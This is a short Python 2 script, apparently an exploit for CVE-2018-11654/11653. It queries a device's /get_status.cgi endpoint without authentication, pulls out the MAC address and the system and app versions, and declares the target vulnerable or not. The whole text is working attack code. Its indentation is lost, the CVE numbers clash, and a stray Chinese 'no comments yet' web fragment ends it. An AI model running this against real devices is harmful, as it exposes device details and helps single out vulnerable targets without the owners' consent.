import requests
import sys
'''
Author: David Castro (SadFud)
Contact: https://twitter.com/SadFud75
CVE: CVE-2018-11654
Output example:
Mac address: 006E0604AF62
System version: 0.37.2.46
App version: 0.2.9.12
Alias: NOA
The target http://REDACTED:8000 is vulnerable to CVE-2018-11653.
'''
url = sys.argv[1] + "/get_status.cgi"
r = requests.get(url);
if r.status_code != 200:
print "Error. Target not exploitable."
exit()
print "Parsing data..."
r = r.text.encode("utf8")
r = r.replace('\';', '')
r = r.replace('var ', '')
r = r.replace('=\'', ' ')
todo = r.split("\n")
wifi = str(todo[14]).split('=')
if wifi[1].replace(';', '') == str(1):
check = "The target " + sys.argv[1] + " is vulnerable to CVE-2018-11653."
else:
check = "The target " + sys.argv[1] + " is not vulnerable to CVE-2018-11653."
mac = todo[0].split(' ')
mac = mac[1]
sys = todo[1].split(' ')
sys = sys[1]
app = todo[2].split(' ')
app = app[1]
暂无评论